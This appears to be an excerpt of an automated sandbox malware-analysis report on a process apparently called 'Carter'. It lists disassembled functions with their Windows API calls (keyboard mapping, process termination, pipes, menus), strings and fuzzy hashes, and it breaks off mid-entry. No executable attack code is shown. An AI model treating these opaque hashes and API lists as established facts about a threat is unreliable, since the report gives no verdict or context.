Instruction Fuzzy Hash: F1014875E04319BBDF105BA59D49A9EBFB8EB48761F408066FA04EB340DA709D10CF50

Function 00B0C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B0C57C
LineTo.GDI32(00000000,00000003,?), ref: 00B0C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C59E
LineTo.GDI32(00000000,00000000,?), ref: 00B0C5AE
EndPath.GDI32(00000000), ref: 00B0C5BE
StrokePath.GDI32(00000000), ref: 00B0C5CE

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
Instruction ID: 13ea90aab4ffb870198f6bc1b95ba08c267436fa95d76af938e993643b9bc76f
Opcode Fuzzy Hash: 2ffa1fa826f967513b505a88e599367b2d5789b906d183f8eaf820bdb161668a
Instruction Fuzzy Hash: 35111E7600010CBFDF12AF95DC89FDA7FADEB08354F048051B91856160DB71AE95DBA0

Function 00AA07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA081A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
Instruction ID: e6b9146ef21e5d0cda0961027d71b4eac33549ddb6ca866d022f73448664e2c0
Opcode Fuzzy Hash: 3fabd94c9a239b85ad7656517368801a70e7c6f1da7b7b7f800cbffbcee196c6
Instruction Fuzzy Hash: C6016CB09017597DE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CBE5

Function 00AE59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AE59B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AE59CA
GetWindowThreadProcessId.USER32(?,?), ref: 00AE59D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AE59F9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
Instruction ID: 5f0c63ecda93286621af64d11a3a2350b7323c743a4103bc2b9a7632752b6fa4
Opcode Fuzzy Hash: b0936afb1bbc2a4861dfa55ac7b288e3caeffdf081ae721ced0a42505159cacd
Instruction Fuzzy Hash: AFF09032250158BFE3216B92AC0DEEF7B3CEFCBB11F404159FA00A2050DFE01A5186B5

Function 00AE77EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00AE77FE
EnterCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE780F
TerminateThread.KERNEL32(00000000,000001F6,?,00A8C2B6,?,?), ref: 00AE781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00A8C2B6,?,?), ref: 00AE7829

Part of subcall function 00AE71F0: CloseHandle.KERNEL32(00000000,?,00AE7836,?,00A8C2B6,?,?), ref: 00AE71FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00AE783C
LeaveCriticalSection.KERNEL32(?,?,00A8C2B6,?,?), ref: 00AE7843

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
Instruction ID: de08b84e8b315df8c232ee00878d109e2e9d45595fd7876bf220b09a77ef3fea
Opcode Fuzzy Hash: 0af02055c0d74b44153125cbe59f5655ef408dc9fdf1369dba1c3e1f538a5c79
Instruction Fuzzy Hash: 4EF08232555212ABD7113B64EC8CAEF7739FF49302F944525F503A60A0DFF95891CBA0

Function 00AD954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AD9555
UnloadUserProfile.USERENV(?,?), ref: 00AD9561
CloseHandle.KERNEL32(?), ref: 00AD956A
CloseHandle.KERNEL32(?), ref: 00AD9572
GetProcessHeap.KERNEL32(00000000,?), ref: 00AD957B
HeapFree.KERNEL32(00000000), ref: 00AD9582

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
Instruction ID: 2d4c226933ea4cc0c2c9c4ee00ff66c4d6d1c7faedebc20d1ce05ee146b53cc2
Opcode Fuzzy Hash: 6f55343c1dabc5faae9105687e4e76edf67c182d59f3c0519c3de26f9f83d3c7
Instruction Fuzzy Hash: C0E0E536114105BBDB012FE1EC0C99ABF39FF4A722B908220F225920B0CFB6A4B0DB50

Function 00AF8CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AF8CFD
CharUpperBuffW.USER32(?,?), ref: 00AF8E0C
VariantClear.OLEAUT32(?), ref: 00AF8F84

Part of subcall function 00AE7B1D: VariantInit.OLEAUT32(00000000), ref: 00AE7B5D
Part of subcall function 00AE7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00AE7B66
Part of subcall function 00AE7B1D: VariantClear.OLEAUT32(00000000), ref: 00AE7B72

Strings

Incorrect Parameter format, xrefs: 00AF8D35, 00AF8EF7
AUTOIT.ERROR, xrefs: 00AF8E12

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 8d19e280c3fcc1d3f7a2240c0392a874bd73606675438c0a4bfd43b4ea09946c
Instruction ID: da885326d52322ccac5fe03a72c3a093ff5b3c82f83baf7505903b8ce4f8b55e
Opcode Fuzzy Hash: 8d19e280c3fcc1d3f7a2240c0392a874bd73606675438c0a4bfd43b4ea09946c
Instruction Fuzzy Hash: 6A91AD706083059FCB00EF64C58096ABBF5EF89754F14896EF98A8B3A1DB30ED45CB52

Function 00AE323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D

_memset.LIBCMT ref: 00AE332E
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE335D
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE3410
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AE343E

Strings

0, xrefs: 00AE331A

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: b08ce1340a0dc4eb60816b7d9d58fa189cc428ac00a961894d54b777955f7c7c
Instruction ID: 8af6c38b236d61ccbd0df0b5461c3128fc89eb17d7b00b328a4fc7da7a22a8ad
Opcode Fuzzy Hash: b08ce1340a0dc4eb60816b7d9d58fa189cc428ac00a961894d54b777955f7c7c
Instruction Fuzzy Hash: 42510332208381ABCF12AF2AC949A6BB7E8EF55320F04492DF895D71D1DB70CE44CB52

Function 00AE2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AE2F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AE2F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00AE2FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B47890,00000000), ref: 00AE3012

Strings

0, xrefs: 00AE2F5C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
Instruction ID: feb8ead44e348ddfb6797f08f918d8f526f96e1227b8109e2359a5d2d0cbc1ba
Opcode Fuzzy Hash: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
Instruction Fuzzy Hash: 5841C6322043819FDB20DF26C889B5ABBE9FF85310F144A5DF5A6972D1DB70EA05CB52

Function 00AD9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AD9ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AD9ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AD9B0F

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Strings

ListBox, xrefs: 00AD9A8B
ComboBox, xrefs: 00AD9A56

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: b8031fb86cc39617c3efa3c6e8d4bdb494acc09c992f5462cdcce15bcafa158f
Instruction ID: 87b7b29372d0578f06191f0f09bf68684bee2f90174d1e1f3174c032a5cd8d53
Opcode Fuzzy Hash: b8031fb86cc39617c3efa3c6e8d4bdb494acc09c992f5462cdcce15bcafa158f
Instruction Fuzzy Hash: 4721E471A41104BEDF14ABA4DC45CFFB7BCDF513A0F61411BF826972E1DB3489469660

Function 00B06A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B06A86
LoadLibraryW.KERNEL32(?), ref: 00B06A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B06AA2
DestroyWindow.USER32(?), ref: 00B06AAA

Strings

SysAnimate32, xrefs: 00B06A61

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: e0ed57db6932d01a3270d12b04f8713dc1abae1c29fcd53e96844186743670ef
Instruction ID: be5299fd61bcc77fdbacbd5c470e7eb6a271a1c7cd4dde7befccacbb2cd7ee4b
Opcode Fuzzy Hash: e0ed57db6932d01a3270d12b04f8713dc1abae1c29fcd53e96844186743670ef
Instruction Fuzzy Hash: 8C21BB71300205AFEF10AEA49C80EBB7BE8EB49324F509258FA50A30D1D7718CA09760

Function 00AE7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00AE7377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE73AA
GetStdHandle.KERNEL32(0000000C), ref: 00AE73BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AE73F6

Strings

nul, xrefs: 00AE73F1

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 095ad592bcd39847af4025261368a9d25c85aefadbc63d8315cffd570a69a889
Instruction ID: e10f4f3817ee84574df0a4c9714a220c53a76df0256bcf63bc7af4a8a1a1ccfd
Opcode Fuzzy Hash: 095ad592bcd39847af4025261368a9d25c85aefadbc63d8315cffd570a69a889
Instruction Fuzzy Hash: 4E218174508347ABDB209F6ADC05A9E7BA5AF44720F204A19FDA0DB2D0DBB0DC50DB50

Function 00AE7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AE7444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE7476
GetStdHandle.KERNEL32(000000F6), ref: 00AE7487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AE74C1

Strings

nul, xrefs: 00AE74BC

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: ec54b848bf6765016d17f7673cb3baa7dc4aa3805b312e12fbfe69208dc9e5ec
Instruction ID: 40662fa1649d856fde4d036a9e2d552cb2b4805ce40bb9da2f03b922eea13f40
Opcode Fuzzy Hash: ec54b848bf6765016d17f7673cb3baa7dc4aa3805b312e12fbfe69208dc9e5ec
Instruction Fuzzy Hash: 9E21B6715083869BDB20AF6A9C44E9D7BF8AF55730F204B19FDA0D72D0DB709851C750

Function 00AEB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AEB297
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AEB2EB
__swprintf.LIBCMT ref: 00AEB304
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B10980), ref: 00AEB342

Strings

%lu, xrefs: 00AEB2FE

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: a10cac855504bdf65b804e59bd831bfae328118afaa00438f13afe62d0c9bb36
Instruction ID: ba314bc375b1d3f088d5e49e2f611857807e4f6ac937737f6b7a682ca2e30c0d
Opcode Fuzzy Hash: a10cac855504bdf65b804e59bd831bfae328118afaa00438f13afe62d0c9bb36
Instruction Fuzzy Hash: 37214135A00109AFCB10EF65C985DEEBBF8EF49704B508069F905EB252DB71EE45CB61

Function 00ADAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

Part of subcall function 00ADAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
Part of subcall function 00ADAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
Part of subcall function 00ADAA52: GetCurrentThreadId.KERNEL32 ref: 00ADAA89
Part of subcall function 00ADAA52: AttachThreadInput.USER32(00000000), ref: 00ADAA90

GetFocus.USER32 ref: 00ADAC2A

Part of subcall function 00ADAA9B: GetParent.USER32(?), ref: 00ADAAA9

GetClassNameW.USER32(?,?,00000100), ref: 00ADAC73
EnumChildWindows.USER32(?,00ADACEB), ref: 00ADAC9B
__swprintf.LIBCMT ref: 00ADACB5

Strings

%s%d, xrefs: 00ADACAF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: b29d675ee51e0bab5cf378c2566568b18b5cdd81b6728d57371d54747f756d79
Instruction ID: 71e0c70c375cd2b7a58e8295d67cb6a32a751a95b483aba3de646e52bc79fdb7
Opcode Fuzzy Hash: b29d675ee51e0bab5cf378c2566568b18b5cdd81b6728d57371d54747f756d79
Instruction Fuzzy Hash: 5F11E775210205ABCF11BFA0CE85FEA37ACAB54710F008076FD0A9A252CA745945DB71

Function 00AE22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00AE2318

Strings

REMOVE, xrefs: 00AE231E
EXISTS, xrefs: 00AE2340
KEYS, xrefs: 00AE232F
APPEND, xrefs: 00AE2351

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 9acace8dfa088530c946eadc7901da42006cf9b30bc573cc9752201a78290db8
Instruction ID: 2fd0fd576697610510e16b1838216ad3aaa16ce35ac7b2e6b5df29e2eddf86c2
Opcode Fuzzy Hash: 9acace8dfa088530c946eadc7901da42006cf9b30bc573cc9752201a78290db8
Instruction Fuzzy Hash: FF117C719101199FCF00EF94C9919EEB3B8FF26344F6080A8E810A72A1EB326D06CF40

Function 00AFF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AFF2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AFF320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AFF453
CloseHandle.KERNEL32(?), ref: 00AFF4D4

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
